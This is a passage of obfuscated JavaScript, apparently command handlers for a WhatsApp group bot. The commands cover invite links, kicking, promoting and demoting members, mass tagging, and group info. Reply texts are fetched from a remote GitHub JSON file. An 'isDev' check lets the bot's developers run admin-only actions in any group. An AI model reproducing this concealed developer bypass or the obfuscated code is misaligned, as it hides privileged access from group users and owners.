fetchJson('https://raw.githubusercontent.com/SILENTLOVER40/SILENT-SOBX-MD-DATA/refs/heads/main/DATABASE/mreply.json'))[_0x72ce3d(0x1c1)];if(!_0x3e1721&&!_0x521974&&!_0x20e786&&!_0x590522)return _0x2a3e11(_0x410294[_0x72ce3d(0x18c)]);if(!_0x454353)return _0x2a3e11(_0x72ce3d(0x18f));let _0x35cc39=_0x13a44f[0x0]['split'](_0x72ce3d(0x123))[0x1];await _0x427334[_0x72ce3d(0x13d)](_0x35cc39);const _0x574014={'text':_0x72ce3d(0x112)},_0x199f95={'quoted':_0xe84103};await _0x427334[_0x72ce3d(0x129)](_0x3c676f,_0x574014,_0x199f95);}catch(_0x217a46){const _0x5b7809={'text':'❌','key':_0xe84103[_0x72ce3d(0x1a9)]},_0x14e53f={'react':_0x5b7809};await _0x427334['sendMessage'](_0x3c676f,_0x14e53f),console[_0x72ce3d(0x130)](_0x217a46),_0x2a3e11(_0x72ce3d(0x1aa)+_0x217a46);}});const _0x4df201={'pattern':_0x199e78(0x18e),'react':_0x199e78(0x162),'alias':[_0x199e78(0x12c),_0x199e78(0x14c)],'desc':'To\x20Get\x20the\x20Group\x20Invite\x20link','category':_0x199e78(0x19e),'use':_0x199e78(0x191),'filename':__filename};cmd(_0x4df201,async(_0x328612,_0xbb33af,_0x397e14,{from:_0x2d0302,l:_0x1f71ff,quoted:_0x3896bd,body:_0x467e3c,isCmd:_0x1fab12,command:_0x291ff8,args:_0x5a04cc,q:_0x240c4e,isGroup:_0x1c6582,sender:_0x1cceb4,senderNumber:_0x570196,botNumber2:_0x4ef89d,botNumber:_0x39f4ea,pushname:_0x2cba2a,isMe:_0x42e8f9,isOwner:_0x1270fb,groupMetadata:_0xfd20b9,groupName:_0x5e9b3b,participants:_0x2ffa8b,groupAdmins:_0x50b479,isBotAdmins:_0x46955c,isCreator:_0x4bebc3,isDev:_0x4d74ea,isAdmins:_0x40ce21,reply:_0x30b983})=>{const _0x1d9165=_0x199e78;try{const _0xf96b8e=(await fetchJson('https://raw.githubusercontent.com/SILENTLOVER40/SILENT-SOBX-MD-DATA/refs/heads/main/DATABASE/mreply.json'))['replyMsg'];if(!_0x1c6582)return _0x30b983(_0xf96b8e[_0x1d9165(0x131)]);if(!_0x40ce21){const _0x15451b={'quoted':_0xbb33af};if(!_0x4d74ea)return _0x30b983(_0xf96b8e[_0x1d9165(0x19f)]),_0x15451b;}if(!_0x46955c)return _0x30b983(_0xf96b8e[_0x1d9165(0x142)]);const _0x47315e=await _0x328612[_0x1d9165(0x135)](_0x2d0302),_0x56af4f={'text':_0x1d9165(0x19d)+_0x47315e},_0x18d24f={'quoted':_0xbb33af};await _0x328612[_0x1d9165(0x129)](_0x2d0302,_0x56af4f,_0x18d24f);}catch(_0x118eb8){const _0x4f56f2={'text':'❌','key':_0xbb33af[_0x1d9165(0x1a9)]},_0x181e96={'react':_0x4f56f2};await _0x328612['sendMessage'](_0x2d0302,_0x181e96),console['log'](_0x118eb8),_0x30b983(_0x1d9165(0x1aa)+_0x118eb8);}});const _0x34bd2a={'pattern':_0x199e78(0x193),'react':_0x199e78(0x162),'alias':['revokegrouplink','resetglink',_0x199e78(0x171),_0x199e78(0x16d)],'desc':'To\x20Reset\x20the\x20group\x20link','category':_0x199e78(0x19e),'use':_0x199e78(0x198),'filename':__filename};cmd(_0x34bd2a,async(_0x220558,_0x3c4e78,_0x4d597c,{from:_0x480f07,l:_0x263060,quoted:_0x4bd5ac,body:_0x30d752,isCmd:_0x533cc4,command:_0x281b83,args:_0x34c1b3,q:_0x37c875,isGroup:_0x49e357,sender:_0x41516c,senderNumber:_0x3d05f3,botNumber2:_0x4fe0dc,botNumber:_0x1527c9,pushname:_0x1105ec,isMe:_0x2c9630,isOwner:_0x39bb24,groupMetadata:_0x38942d,groupName:_0x467366,participants:_0x4bd2e8,groupAdmins:_0x2c3858,isBotAdmins:_0x2489c0,isCreator:_0x14fc8f,isDev:_0x4fc853,isAdmins:_0x5a6072,reply:_0x38599d})=>{const _0x48f841=_0x199e78;try{const _0x1ca24d=(await fetchJson(_0x48f841(0x152)))['replyMsg'];if(!_0x49e357)return _0x38599d(_0x1ca24d[_0x48f841(0x131)]);if(!_0x5a6072){const _0x465774={'quoted':_0x3c4e78};if(!_0x4fc853)return _0x38599d(_0x1ca24d[_0x48f841(0x19f)]),_0x465774;}if(!_0x2489c0)return _0x38599d(_0x1ca24d[_0x48f841(0x142)]);await _0x220558[_0x48f841(0x181)](_0x480f07);const _0x3208f9={'text':_0x48f841(0x18a)},_0x5afe0a={'quoted':_0x3c4e78};await _0x220558[_0x48f841(0x129)](_0x480f07,_0x3208f9,_0x5afe0a);}catch(_0x4f832a){const _0x59dc32={'text':'❌','key':_0x3c4e78[_0x48f841(0x1a9)]},_0x5d88c7={'react':_0x59dc32};await _0x220558[_0x48f841(0x129)](_0x480f07,_0x5d88c7),console[_0x48f841(0x130)](_0x4f832a),_0x38599d(_0x48f841(0x1aa)+_0x4f832a);}});const _0x57538f={'pattern':_0x199e78(0x141),'react':'🥏','alias':[_0x199e78(0x15d)],'desc':_0x199e78(0x17f),'category':_0x199e78(0x19e),'use':_0x199e78(0x15a),'filename':__filename};cmd(_0x57538f,async(_0x270881,_0x4dbf17,_0x1c171b,{from:_0x3d6075,l:_0x198833,quoted:_0x42b898,body:_0x4c29d8,isCmd:_0x539ade,command:_0x2fae7d,mentionByTag:_0x206019,args:_0x44d923,q:_0x210c72,isGroup:_0x516c23,sender:_0x3b48a9,senderNumber:_0x423c17,botNumber2:_0x49d400,botNumber:_0x4a2d97,pushname:_0x4c1491,isMe:_0x12dbb5,isOwner:_0x2a3fb3,groupMetadata:_0x55a8f6,groupName:_0x48ced7,participants:_0x3d8dd6,groupAdmins:_0x19f894,isBotAdmins:_0x1ab85b,isCreator:_0x2dc164,isDev:_0x47c43e,isAdmins:_0x955c69,reply:_0xb3b0a6})=>{const _0x2cfbd7=_0x199e78;try{const _0x11b97a=(await fetchJson('https://raw.githubusercontent.com/SILENTLOVER40/SILENT-SOBX-MD-DATA/refs/heads/main/DATABASE/mreply.json'))[_0x2cfbd7(0x1c1)];if(!_0x516c23)return _0xb3b0a6(_0x11b97a[_0x2cfbd7(0x131)]);if(!_0x955c69){const _0x501966={'quoted':_0x4dbf17};if(!_0x47c43e)return _0xb3b0a6(_0x11b97a[_0x2cfbd7(0x19f)]),_0x501966;}if(!_0x1ab85b)return _0xb3b0a6(_0x11b97a[_0x2cfbd7(0x142)]);let _0x3ad017=_0x4dbf17[_0x2cfbd7(0x143)]?_0x4dbf17['mentionedJid'][0x0]:_0x4dbf17[_0x2cfbd7(0x1c3)][_0x2cfbd7(0x188)][_0x2cfbd7(0x149)]||![];if(!_0x3ad017)return _0xb3b0a6(_0x2cfbd7(0x156));await _0x270881['groupParticipantsUpdate'](_0x3d6075,[_0x3ad017],_0x2cfbd7(0x15d));const _0x175ada={'text':_0x2cfbd7(0x194)},_0xb35e0b={'quoted':_0x4dbf17};await _0x270881[_0x2cfbd7(0x129)](_0x3d6075,_0x175ada,_0xb35e0b);}catch(_0xa522dc){const _0x474926={'text':'❌','key':_0x4dbf17[_0x2cfbd7(0x1a9)]},_0x5cbfdc={'react':_0x474926};await _0x270881['sendMessage'](_0x3d6075,_0x5cbfdc),console[_0x2cfbd7(0x130)](_0xa522dc),_0xb3b0a6(_0x2cfbd7(0x1aa)+_0xa522dc);}});const _0xd699f4={'pattern':_0x199e78(0x183),'react':'🥏','alias':[_0x199e78(0x12b)],'desc':_0x199e78(0x13b),'category':_0x199e78(0x19e),'use':_0x199e78(0x153),'filename':__filename};cmd(_0xd699f4,async(_0x2ee8e1,_0x208263,_0xd535ae,{from:_0x326b42,l:_0xc052c3,quoted:_0x1e75a2,body:_0xacd6fd,isCmd:_0x407f57,command:_0x41e991,mentionByTag:_0x389b40,args:_0x56013b,q:_0x1a8ba6,isGroup:_0x99a411,sender:_0x327ff9,senderNumber:_0x410af4,botNumber2:_0xe0c643,botNumber:_0x6f2d41,pushname:_0x4e24e6,isMe:_0x49a97c,isOwner:_0x1ed83f,groupMetadata:_0x59678b,groupName:_0x53669e,participants:_0x385024,groupAdmins:_0x4cce9c,isBotAdmins:_0x5912bb,isCreator:_0x2e4f0d,isDev:_0x48e045,isAdmins:_0x524aaa,reply:_0x283414})=>{const _0x297fea=_0x199e78;try{const _0xc0be08=(await fetchJson(_0x297fea(0x152)))['replyMsg'];if(!_0x99a411)return _0x283414(_0xc0be08[_0x297fea(0x131)]);if(!_0x524aaa){const _0x2bc157={'quoted':_0x208263};if(!_0x48e045)return _0x283414(_0xc0be08[_0x297fea(0x19f)]),_0x2bc157;}if(!_0x5912bb)return _0x283414(_0xc0be08[_0x297fea(0x142)]);let _0x5aa925=_0x208263[_0x297fea(0x143)]?_0x208263['mentionedJid'][0x0]:_0x208263[_0x297fea(0x1c3)]['contextInfo']['participant']||![];if(!_0x5aa925)return _0x283414(_0x297fea(0x156));const _0x4113d2=await getGroupAdmins(_0x385024);if(_0x4113d2[_0x297fea(0x1a2)](_0x5aa925))return _0x283414(_0x297fea(0x17e));await _0x2ee8e1[_0x297fea(0x179)](_0x326b42,[_0x5aa925],_0x297fea(0x183));const _0x11aee={'text':'*User\x20promoted\x20as\x20an\x20Admin*\x20\x20✔️'},_0x48c3ee={'quoted':_0x208263};await _0x2ee8e1[_0x297fea(0x129)](_0x326b42,_0x11aee,_0x48c3ee);}catch(_0xff17d8){const _0x1f8671={'text':'❌','key':_0x208263[_0x297fea(0x1a9)]},_0x5f0784={'react':_0x1f8671};await _0x2ee8e1[_0x297fea(0x129)](_0x326b42,_0x5f0784),console[_0x297fea(0x130)](_0xff17d8),_0x283414(_0x297fea(0x1aa)+_0xff17d8);}});const _0x10f253={'pattern':_0x199e78(0x1a8),'react':'🥏','alias':[_0x199e78(0x132)],'desc':'To\x20Demote\x20Admin\x20to\x20Member','category':_0x199e78(0x19e),'use':_0x199e78(0x175),'filename':__filename};cmd(_0x10f253,async(_0x3ac351,_0x5dc2ea,_0x512aa7,{from:_0x1711ce,l:_0x2bc0e8,quoted:_0x846887,body:_0x357636,isCmd:_0x2f56b6,command:_0x46f811,mentionByTag:_0x2d786e,args:_0x221497,q:_0x1bf0ac,isGroup:_0x6984ca,sender:_0x574c6d,senderNumber:_0x25eec5,botNumber2:_0x4cd53f,botNumber:_0x19c03a,pushname:_0xcfe85e,isMe:_0x3a578c,isOwner:_0x586966,groupMetadata:_0x5b8cb6,groupName:_0x1adbed,participants:_0x3a19c7,groupAdmins:_0x453bb7,isBotAdmins:_0x483ce9,isCreator:_0x24880e,isDev:_0x44e18c,isAdmins:_0x53001f,reply:_0x807ff4})=>{const _0x2c8e88=_0x199e78;try{const _0x185af3=(await fetchJson(_0x2c8e88(0x152)))['replyMsg'];if(!_0x6984ca)return _0x807ff4(_0x185af3[_0x2c8e88(0x131)]);if(!_0x53001f){const _0x12223c={'quoted':_0x5dc2ea};if(!_0x44e18c)return _0x807ff4(_0x185af3[_0x2c8e88(0x19f)]),_0x12223c;}if(!_0x483ce9)return _0x807ff4(_0x185af3['give_adm']);let _0x4e91f3=_0x5dc2ea['mentionedJid']?_0x5dc2ea[_0x2c8e88(0x143)][0x0]:_0x5dc2ea[_0x2c8e88(0x1c3)][_0x2c8e88(0x188)][_0x2c8e88(0x149)]||![];if(!_0x4e91f3)return _0x807ff4('*Couldn\x27t\x20find\x20any\x20user\x20in\x20context*\x20❌');const _0x207ab3=await getGroupAdmins(_0x3a19c7);if(!_0x207ab3[_0x2c8e88(0x1a2)](_0x4e91f3))return _0x807ff4(_0x2c8e88(0x1b6));await _0x3ac351[_0x2c8e88(0x179)](_0x1711ce,[_0x4e91f3],_0x2c8e88(0x1a8));const _0x1e33eb={'text':_0x2c8e88(0x120)},_0x30a36c={'quoted':_0x5dc2ea};await _0x3ac351[_0x2c8e88(0x129)](_0x1711ce,_0x1e33eb,_0x30a36c);}catch(_0x310923){const _0x30ad59={'text':'❌','key':_0x5dc2ea[_0x2c8e88(0x1a9)]},_0x2975c3={'react':_0x30ad59};await _0x3ac351[_0x2c8e88(0x129)](_0x1711ce,_0x2975c3),console[_0x2c8e88(0x130)](_0x310923),_0x807ff4(_0x2c8e88(0x1aa)+_0x310923);}});const _0x53a4af={'pattern':_0x199e78(0x172),'react':'🔊','alias':['f_tagall'],'desc':_0x199e78(0x19c),'category':_0x199e78(0x19e),'use':_0x199e78(0x11b),'filename':__filename};cmd(_0x53a4af,async(_0x40f65f,_0x4b0820,_0x55e1ef,{from:_0x462425,l:_0x1790fa,quoted:_0x3283ea,body:_0x209ea4,isCmd:_0x2b7e14,command:_0x3d9500,mentionByTag:_0x2c3a59,args:_0x264770,q:_0x2f37d0,isGroup:_0xcc06d8,sender:_0x556d44,senderNumber:_0x3901ef,botNumber2:_0x315776,botNumber:_0x4b4563,pushname:_0x39f8de,isMe:_0x1f3c01,isOwner:_0x392d84,groupMetadata:_0x3221d0,groupName:_0x23ea4e,participants:_0x220fb7,groupAdmins:_0x5b4496,isBotAdmins:_0x291e1f,isCreator:_0x534b67,isDev:_0xb9749f,isAdmins:_0x27fa5e,reply:_0x58600c})=>{const _0x182b2c=_0x199e78;try{const _0x4b6814=(await fetchJson(_0x182b2c(0x152)))[_0x182b2c(0x1c1)];if(!_0xcc06d8)return _0x58600c(_0x4b6814['only_gp']);if(!_0x27fa5e){const _0x5cf453={'quoted':_0x4b0820};if(!_0xb9749f)return _0x58600c(_0x4b6814[_0x182b2c(0x19f)]),_0x5cf453;}if(!_0x291e1f)return _0x58600c(_0x4b6814[_0x182b2c(0x142)]);let _0x3e50a6=_0x182b2c(0x1b1);for(let _0xaf7f6a of _0x220fb7){_0x3e50a6+=_0x182b2c(0x1ac)+_0xaf7f6a['id'][_0x182b2c(0x17c)]('@')[0x0]+'\x0a';}const _0x414212={'quoted':_0x4b0820};_0x40f65f[_0x182b2c(0x129)](_0x462425,{'text':_0x3e50a6,'mentions':_0x220fb7[_0x182b2c(0x12f)](_0x38c332=>_0x38c332['id'])},_0x414212);}catch(_0x40bd15){const _0x35d7ef={'text':'❌','key':_0x4b0820[_0x182b2c(0x1a9)]},_0x236678={'react':_0x35d7ef};await _0x40f65f[_0x182b2c(0x129)](_0x462425,_0x236678),console['log'](_0x40bd15),_0x58600c(_0x182b2c(0x1aa)+_0x40bd15);}});const _0x3220aa={'pattern':_0x199e78(0x16b),'react':'🔊','alias':[_0x199e78(0x138),'f_tag'],'desc':_0x199e78(0x14e),'category':_0x199e78(0x19e),'use':_0x199e78(0x14b),'filename':__filename};cmd(_0x3220aa,async(_0x1a1e4a,_0x436c5b,_0x2e8b1e,{from:_0xd18da6,l:_0x2b9664,quoted:_0xc87805,body:_0x38cb39,isCmd:_0x5d93e2,command:_0x353f4d,mentionByTag:_0x1ea106,args:_0x1648d1,q:_0x20c55f,isGroup:_0x5957a1,sender:_0x5c0c4f,senderNumber:_0x53c2f8,botNumber2:_0x556ffe,botNumber:_0x11cacc,pushname:_0x27811b,isMe:_0x2f4853,isOwner:_0x559990,groupMetadata:_0x55bc88,groupName:_0x57488b,participants:_0x3c04ad,groupAdmins:_0x428dfd,isBotAdmins:_0x2738ac,isCreator:_0x485f42,isDev:_0x3435bb,isAdmins:_0x381e60,reply:_0x19fae9})=>{const _0x233cda=_0x199e78;try{const _0x7c7076=(await fetchJson(_0x233cda(0x152)))[_0x233cda(0x1c1)];if(!_0x5957a1)return _0x19fae9(_0x7c7076[_0x233cda(0x131)]);if(!_0x381e60){const _0x33cca6={'quoted':_0x436c5b};if(!_0x3435bb)return _0x19fae9(_0x7c7076[_0x233cda(0x19f)]),_0x33cca6;}if(!_0x2738ac)return _0x19fae9(_0x7c7076[_0x233cda(0x142)]);if(!_0x20c55f)return _0x19fae9(_0x233cda(0x184));let _0xa97460=''+_0x20c55f;const _0x29c890={'quoted':_0x436c5b};_0x1a1e4a[_0x233cda(0x129)](_0xd18da6,{'text':_0xa97460,'mentions':_0x3c04ad[_0x233cda(0x12f)](_0x22d4c8=>_0x22d4c8['id'])},_0x29c890);}catch(_0x5533e9){const _0x186d87={'text':'❌','key':_0x436c5b[_0x233cda(0x1a9)]},_0x4e9385={'react':_0x186d87};await _0x1a1e4a[_0x233cda(0x129)](_0xd18da6,_0x4e9385),console['log'](_0x5533e9),_0x19fae9(_0x233cda(0x1aa)+_0x5533e9);}});const _0x446ca7={'pattern':_0x199e78(0x166),'react':'🔊','alias':['tggp',_0x199e78(0x1b4)],'desc':_0x199e78(0x14e),'category':_0x199e78(0x19e),'use':_0x199e78(0x14b),'filename':__filename};cmd(_0x446ca7,async(_0x38ee4a,_0x242086,_0x390f01,{from:_0x46edc0,l:_0x1c4af4,quoted:_0x57e007,body:_0x1e351f,isCmd:_0x18995b,command:_0x5e8c7a,mentionByTag:_0x1f46dd,args:_0x22b118,q:_0x5888ac,isGroup:_0x777d02,sender:_0x463a7e,senderNumber:_0x1c56b1,botNumber2:_0x15b4d1,botNumber:_0x14865c,pushname:_0x3c5929,isMe:_0x47dfba,isOwner:_0x5fd946,groupMetadata:_0x72e314,groupName:_0x523c24,participants:_0x167c81,groupAdmins:_0x3ed30a,isBotAdmins:_0x233150,isCreator:_0x4782f5,isDev:_0x301290,isAdmins:_0x169c22,reply:_0x461de8})=>{const _0x10348e=_0x199e78;try{if(!_0x390f01[_0x10348e(0x115)])return _0x461de8(_0x10348e(0x187));if(!_0x5888ac)return _0x461de8(_0x10348e(0x1c2));let _0x2e603e=''+_0x390f01[_0x10348e(0x115)][_0x10348e(0x1c3)];const _0x20f251={'quoted':_0x242086};_0x38ee4a['sendMessage'](_0x5888ac,{'text':_0x2e603e,'mentions':_0x167c81['map'](_0x1bf050=>_0x1bf050['id'])},_0x20f251);}catch(_0x5f239f){const _0x5c0b0a={'text':'❌','key':_0x242086[_0x10348e(0x1a9)]},_0x5e177f={'react':_0x5c0b0a};await _0x38ee4a[_0x10348e(0x129)](_0x46edc0,_0x5e177f),console[_0x10348e(0x130)](_0x5f239f),_0x461de8('❌\x20*Error\x20Accurated\x20!!*\x0a\x0a'+_0x5f239f);}});const _0x4c04aa={'pattern':_0x199e78(0x15f),'react':'🥏','alias':[_0x199e78(0x18d)],'desc':_0x199e78(0x13c),'category':_0x199e78(0x19e),'use':_0x199e78(0x124),'filename':__filename};cmd(_0x4c04aa,async(_0x2626dd,_0x5b52e4,_0x127807,{from:_0x1c6b4d,l:_0x254aba,quoted:_0x3293ab,body:_0x55e1db,isCmd:_0x108a94,command:_0x2b7220,args:_0x49d999,q:_0x1f0393,isGroup:_0x1873b5,sender:_0x202ca2,senderNumber:_0x2f53e1,botNumber2:_0x1a0ac6,botNumber:_0x2bb80a,pushname:_0x4d7045,isMe:_0x5a32da,isOwner:_0x59e3b2,groupMetadata:_0x427d11,groupName:_0x2b4510,participants:_0x32c1dc,groupAdmins:_0x548409,isBotAdmins:_0x55cdec,isCreator:_0xd88bfc,isDev:_0x1e8cc4,isAdmins:_0x282a1f,reply:_0x10ab83})=>{const _0x3cf799=_0x199e78;try{const _0x5c7a90=(await fetchJson('https://raw.githubusercontent.com/SILENTLOVER40/SILENT-SOBX-MD-DATA/refs/heads/main/DATABASE/mreply.json'))[_0x3cf799(0x1c1)];if(!_0x1873b5)return _0x10ab83(_0x5c7a90[_0x3cf799(0x131)]);if(!_0x282a1f){const _0x53f37c={'quoted':_0x5b52e4};if(!_0x1e8cc4)return _0x10ab83(_0x5c7a90[_0x3cf799(0x19f)]),_0x53f37c;}if(!_0x55cdec)return _0x10ab83(_0x5c7a90[_0x3cf799(0x142)]);const _0x5c9fee=await _0x2626dd['groupMetadata'](_0x1c6b4d);let _0x24f2db=await _0x2626dd[_0x3cf799(0x12d)](_0x1c6b4d,_0x3cf799(0x176));const _0xc600dc='\x0a*'+_0x5c9fee[_0x3cf799(0x161)]+_0x3cf799(0x137)+_0x5c9fee['id']+_0x3cf799(0x197)+_0x5c9fee[_0x3cf799(0x1a3)]+_0x3cf799(0x113)+_0x5c9fee[_0x3cf799(0x1b7)]+_0x3cf799(0x195)+_0x5c9fee[_0x3cf799(0x17a)]+'\x0a\x0a',_0x43b21f={'url':_0x24f2db},_0x236103={'quoted':_0x5b52e4};await _0x2626dd[_0x3cf799(0x129)](_0x1c6b4d,{'image':_0x43b21f,'caption':_0xc600dc+config[_0x3cf799(0x1a4)]},_0x236103);}catch(_0x8f5819){const _0x4d3eff={'text':'❌','key':_0x5b52e4[_0x3cf799(0x1a9)]},_0x4439eb={'react':_0x4d3eff};await _0x2626dd['sendMessage'](_0x1c6b4d,_0x4439eb),console['log'](_0x8f5819),_0x10ab83(_0x3cf799(0x1aa)+_0x8f5819);}});
|